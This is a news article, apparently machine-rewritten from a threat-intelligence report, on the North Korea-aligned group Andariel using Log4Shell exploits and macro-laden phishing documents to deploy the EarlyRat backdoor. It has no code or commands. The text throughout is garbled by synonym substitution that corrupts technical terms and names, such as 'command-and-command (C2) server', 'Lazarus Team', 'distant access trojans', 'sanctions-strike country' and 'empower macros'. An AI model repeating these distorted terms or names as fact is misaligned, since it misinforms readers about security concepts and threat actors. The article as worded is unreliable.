The North Korea-aligned threat actor identified as Andariel leveraged a formerly undocumented malware termed EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last 12 months.
“Andariel infects equipment by executing a Log4j exploit, which, in switch, downloads further more malware from the command-and-command (C2) server,” Kaspersky said in a new report.
Also referred to as Silent Chollima and Stonefly, Andariel is linked with North Korea’s Lab 110, a primary hacking unit that also properties APT38 (aka BlueNoroff) and other subordinate factors collectively tracked less than the umbrella identify Lazarus Team.
The threat actor, apart from conducting espionage attacks towards international governing administration and armed service entities that are of strategic curiosity, is regarded to carry out cyber criminal offense as an added resource of earnings to the sanctions-strike country.
Some of the important cyber weapons in its arsenal involve a ransomware pressure referred to as Maui and many distant access trojans and backdoors this kind of as Dtrack (aka Valefor and Preft), NukeSped (aka Manuscrypt), MagicRAT, and YamaBot.
NukeSped contains a assortment of capabilities to produce and terminate procedures and shift, read, and create documents on the contaminated host. The use of NukeSped overlaps with a campaign tracked by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) less than the title TraderTraitor.
Andariel’s weaponization of the Log4Shell vulnerability in unpatched VMware Horizon servers was beforehand documented by AhnLab Security Crisis Reaction Centre (ASEC) and Cisco Talos in 2022.
The latest attack chain learned by Kaspsersky exhibits that EarlyRat is propagated by signifies of phishing email messages made up of decoy Microsoft Phrase documents. The data files, when opened, prompt the recipients to empower macros, foremost to the execution of VBA code responsible for downloading the trojan.
Explained as a easy but minimal backdoor, EarlyRat is intended to collect and exfiltrate technique data to a distant server as properly as execute arbitrary instructions. It also shares high-stage similarities with MagicRAT, not to mention penned applying a framework referred to as PureBasic. MagicRAT, on the other hand, employs the Qt Framework.
A further attribute of the intrusion is the use of legitimate off-the-shelf resources like 3Proxy, ForkDump, NTDSDumpEx, Powerline, and PuTTY for even further exploitation of the focus on.
“Inspite of remaining an APT team, Lazarus is identified for doing usual cyber crime jobs, these as deploying ransomware, which can make the cybercrime landscape a lot more sophisticated,” Kaspersky reported. “Also, the group works by using a extensive variety of custom made instruments, frequently updating existing and building new malware.”
Observed this write-up interesting? Abide by us on Twitter and LinkedIn to examine extra exclusive articles we put up.
Some parts of this article are sourced from:
thehackernews.com